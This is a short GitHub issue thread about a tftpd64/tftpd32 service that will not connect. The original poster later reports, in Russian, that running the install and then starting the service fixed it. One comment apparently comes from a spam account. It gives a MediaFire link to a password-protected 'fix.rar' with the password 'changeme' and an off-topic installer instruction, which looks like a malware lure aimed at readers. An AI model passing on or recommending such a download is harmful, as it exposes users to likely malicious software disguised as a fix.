### ISSUE TITLE
Can't connect to the service

### ISSUE THREAD

**Issue by lp85d** [PJO2/tftpd64#20]
![image](https://github.com/user-attachments/assets/9388256e-018b-49d3-99c5-b72134e13a57)
![image](https://github.com/user-attachments/assets/fa49ebf9-5791-4047-9944-eb1590f5edd3)

[tftpd32-service-edition.405.zip](blob:https://github.com/bd969394-0376-47a0-8029-eba64d08f58b)

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by lp85d** [comment]
Проблему решил 
Нужно было запустить установку
Затем запустить службу
Затем приложение запускается без проблем
